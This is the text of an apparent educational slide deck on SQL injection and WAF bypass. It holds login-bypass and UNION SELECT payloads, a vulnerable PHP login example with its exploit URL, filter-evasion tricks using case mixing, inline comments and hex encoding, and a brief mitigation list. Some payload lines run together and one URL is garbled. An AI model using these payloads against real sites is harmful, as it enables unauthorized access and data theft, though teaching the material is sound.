All Ab0ut 0f SQL Injection and WAF Bypass Techniques
THATSANAI DETDAMRONGPREEECHA
COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG
What is SQL Injection ?
Sql injection is code injection
Happened when user Inject sql command for change condition
because develop not filtered input from user
Logical Conjunction and Disjunction table
SQL Operator
And , &&
Or , ||
Like
*
( , )
< , >
+, - , *, /, %
SQL Comment
end of the line
"#"
"--"
"-- "
multiple line
/* */
Examples
vulnerability and inject command
sql command :
SELECT first_name, last_name FROM users WHERE user_id = '$id‘
Inject code :
SELECT first_name, last_name FROM users WHERE user_id = '1‘ or ‘1’SELECT first_name, last_name FROM users WHERE user_id = 'am’ or ‘am’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘1’=‘1’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘2600’=‘2600’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘HELLO’ or ‘HELLO’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or 1 #’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or true #’
sql command :
SELECT first_name, last_name FROM users WHERE user_id = $id
Inject code :
true‘1’ or ‘1’2 or 2
sql command :
SELECT first_name, last_name FROM users WHERE user_id = ($id)
Inject code :
1) or (12+3) or (5
http://cs.ssru.ac.th/cs01/mae/Pae/ตั�วอย่�างและโปรแกรมที่��โหลดๆมา/Login_thaicreate/PHP MySQL ก�บLogin Form ที่�าระบบ User ล�อกอ�น แบบง�าย่ ๆ ด�วย่ PHP และ MySQL โดย่ที่�าการตัรวจสอบ Username และPassword.htm
http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html
http://www.exploit-db.com/exploits/26405/
http://www.exploit-db.com/exploits/26416/
Example
$sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND username='".$_GET['username']."'";
$result = mysql_query($sql, $db);
if ($result === FALSE)
die('Invalid SQL query');
if (mysql_num_rows($result) == 1) {
echo "Congrats, WIN!!!\n";
}
else {
echo "The number of rows is not 1\n";
}
login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
Impact
Get Information in database
Can gaining access system
Etc.
Bypass Web Application Firewall
Techniques
What is Web Application Firewall
Web application Firewall ( WAF )
Software or Hardware
Emphasis in prevention on the website
Filters all data in application layer
Can detected and prevention website
How to Bypass? Original
1’ or ‘1’=‘1
union all select 1,2,3,4,5 –
union all select 1,2,@@version,4,5 –
Solution 1’ oR ‘1’=‘1
uNIon AlL sELeCt 1,2,3,4,5 –
u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --
How to Bypass? (cont.)
If Filter or , and
Solve : Using || instead of or
Using && instead of and
How to Bypass? (cont.)
If Filter where
Solve : Using limit instead of where
If Filter limit
Solve : You can Using group by and having instead of where
How to Bypass? (cont.)
If Filter whitespace
Solve : Using %0b instead of whitespace
If Filter ‘
Solve : Using 0xXX , unhex(xx) instead of ‘
How to Mitigation
Top 5 Secure Coding Tips for PHP applications
Filter Input Data GET , POST , COOKIE
Securing Database Queries
Filter Output Data htmlspecialchars()
htmlentities()
strip_tags()
strtr()
Error Handling log_errors = On
display_errors = Off
Preventing other injection attacks
References and Appendix
www.owasp.org
http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/
http://dev.mysql.com/doc/refman/5.0/en/non-typed-operators.html
http://thtutz.blogspot.com